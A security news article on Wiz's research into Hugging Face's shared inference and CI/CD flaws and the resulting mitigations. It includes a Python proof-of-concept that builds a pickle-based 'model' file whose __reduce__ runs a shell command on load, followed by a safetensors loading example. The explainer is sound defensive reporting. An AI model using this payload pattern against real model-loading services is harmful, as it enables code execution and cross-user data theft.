Hugging Face Fixed Troubling Issues for Better Security

Apr 8, 2024 - 16:21

Hugging Face receives a huge number of AI models for testing and evaluation, and those models can be vulnerable to hackers. Artificial intelligence is being adopted at a rate never seen before. This frenzy has helped produce many useful tools, but it has also given hackers a faster and easier way to carry out their malicious strategies. In Hugging Face's case, attackers had a way to retrieve user information by running their own code on the platform.

According to researchers at cloud security firm Wiz, there were two major flaws in the architecture where machine learning (ML) models are executed: a shared inference infrastructure takeover risk and a shared continuous integration and continuous deployment (CI/CD) takeover risk. These flaws left users at the mercy of black-hat attackers. In simpler words, they gave hackers a covert way to upload their own code and tamper with the registries.

Hugging Face’s partnership with Wiz to explore the shortcomings

By uploading their own malicious AI models, hackers could gain unauthorized access to other users’ data. This was a serious problem and could have dented Hugging Face’s reputation, since the platform is used extensively to store and run AI models as an AI-as-a-Service (AIaaS) offering. Wiz has partnered with AIaaS companies to find security vulnerabilities in these platforms. In Hugging Face’s case, its immense popularity and adoption put it on hackers’ radar. Wiz’s collaboration gave Hugging Face a good opportunity to remediate the shortcomings in its system and strengthen the platform’s security measures.

As we know, AI models require significant GPU power to run, so startups and other smaller vendors rely on AI service-provider companies. Hugging Face’s Inference API provides exactly this service. As part of the research, Wiz ran its own malicious AI model with features that compromised the Hugging Face service. This made the system vulnerable, and Wiz could access the models of other customers using the Hugging Face service.
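For readers wondering how uploading a "model" can turn into code execution: many model formats are serialized with Python's pickle, and unpickling untrusted data can run arbitrary code. The article does not spell out the exact technique Wiz used, but the sketch below (with a hypothetical file name and a harmless command) illustrates this general class of issue.

```python
# Illustration only: a minimal sketch of how an uploaded "model" file can run
# attacker-controlled code when it is deserialized. The exact vector used in
# the Wiz research is not described in this article; pickle-based model
# formats are simply a well-known example of this class of problem.
import os
import pickle


class MaliciousPayload:
    # __reduce__ tells pickle how to "rebuild" the object on load;
    # here it rebuilds it by executing a shell command.
    def __reduce__(self):
        return (os.system, ("echo code execution during model load",))


# The attacker serializes the payload into a file that looks like model weights...
with open("model.bin", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# ...and any service that naively unpickles the upload runs the command.
with open("model.bin", "rb") as f:
    pickle.load(f)  # runs the shell command during deserialization
```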

Solutions and remedies for protection on AIaaS platforms

Wiz stated on its blog that these shortcomings do not plague Hugging Face alone; rather, they have broader implications for the entire AI-as-a-Service industry. All players in the industry face risks of a similar magnitude, as hackers see these platforms as a GitHub of AI models and seek to gain cross-user access illegally.

Hugging Face and Wiz jointly suggested precautions to prevent such security breaches: stringent security controls and regular monitoring of activity. They also recommended using secure registries and running user applications in sandboxed environments, fencing off the places where code and models are stored to prevent cross-user access.
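On the user side, one concrete mitigation (not named explicitly in the article, but consistent with the advice above) is to avoid unpickling untrusted weights at all and prefer a tensors-only format such as safetensors. A minimal sketch, assuming PyTorch 1.13+ and the `safetensors` package are installed and using a hypothetical helper name:

```python
import torch
from safetensors.torch import load_file


def load_untrusted_weights(path: str):
    """Load model weights from an untrusted source without executing code."""
    if path.endswith(".safetensors"):
        # safetensors stores raw tensors only, so loading it cannot run
        # arbitrary code the way unpickling a .bin/.pt checkpoint can.
        return load_file(path)
    # For pickle-based checkpoints, restrict unpickling to tensors and
    # primitive types instead of arbitrary Python objects.
    return torch.load(path, map_location="cpu", weights_only=True)
```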

Research info at Wiz

